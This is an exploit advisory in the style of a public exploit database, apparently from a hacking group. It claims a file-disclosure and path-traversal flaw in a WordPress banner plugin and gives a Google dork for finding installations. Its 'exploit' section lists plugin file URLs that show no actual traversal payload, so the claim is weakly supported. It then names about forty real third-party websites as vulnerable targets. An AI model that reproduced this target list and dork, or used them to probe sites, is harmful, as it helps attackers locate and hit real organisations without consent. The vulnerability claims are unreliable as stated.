########################################################################### # Exploit Title : WordPress all_in_one_bannerWithPlaylist Plugins 5.0.3 File Information Exposure # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 14/01/2019 # Vendor Homepage : lambertgroupproductions.com ~ responsivejqueryslider.com # Software Download Link : responsivejqueryslider.com/wordpressplugin/playlist_banner.html # Software Information Link : themesinfo.com/wordpress-plugins/wordpress-all_in_one_bannerwithplaylist-plugin-dgut # Tested On : Windows and Linux # Category : WebApps # Affected Versions : 1.0 - 1.2.8 - 1.4.7 - 1.8.1 - 1.8.5 - 2.0 - 2.1.3 - 2.2.0 - 2.4 - 4.0.25 - 4.5.16 - 4.9.9 - 5.0.3 # Exploit Risk : High # Google Dorks : inurl:"/wp-content/plugins/all_in_one_bannerWithPlaylist/" # Vulnerability Type : CWE-200 [ Information Exposure ] CWE-538 [ File and Directory Information Exposure ] CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ] ########################################################################### # Impact : ******** * WordPress all_in_one_bannerWithPlaylist 5.0.3 and other versions is prone to an arbitrary file disclosure vulnerability because it fails to properly sanitize user-supplied input. * An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in launching further attacks. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. * The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere. * The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. ########################################################################### # Exploit : *********************** /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php?page=all_in_one_bannerWithPlaylist_Manage_Banners /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php?page=all_in_one_bannerWithPlaylist_Playlist /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/banners.php /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/help.php /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Manage_Banners /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Add_New /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Settings /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Playlist /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Help /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/playlist.php /wp-content/plugins/lbg_zoominoutslider/tpl/preview.html /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/settings_form.php ########################################################################### # Video Tutorials : ***************** Step 1: Installation : youtube.com/watch?v=nYp94Ri8CME Step 2: Manage Images : youtube.com/watch?v=gQezs4xWwSs Step 3: Manage Text Over Image : youtube.com/watch?v=3wR64OtLx7Q Step 4: Manage Multiple Banners : youtube.com/watch?v=3EfdmbjTvoY ########################################################################### # Example Vulnerable Sites : ************************* [+] lwd.org.kh/lc/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] copas-mpa.fr/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] okrls.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php [+] eagletonpoll.rutgers.edu/new-wp/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] fcsn.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] i-groupuk.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] princetonmanagement.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] looemarineconservation.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] liftandlube.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] lehmanneng.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] wallaces.ie/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] walkthewalkamerica.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] whoshapesourtimes.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] wemarket-lb.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] fight-club.tv/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] theayurway.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] wellingtonbridge.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] tuacapulco.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] mmojam.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] moebelaktion.ch/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] aquapools.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] huris.nl/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] certifiedtreeservices.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] park-med.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] llcform.us/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] krankas.sk/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] truescapemo.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] thereverendesquire.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] thebarrebelles.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] theaxess.net/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] ltsa.com.br/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] interkomitet.uz/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] avcaix.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] schoenphoto.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] yucatanbeachstand.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] roseumedicalcenter.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] eftportal.com.br/gilberto/homologacao/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] cappello.co.za/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php [+] tarwada.co.ae/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php ################################################################################################ # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################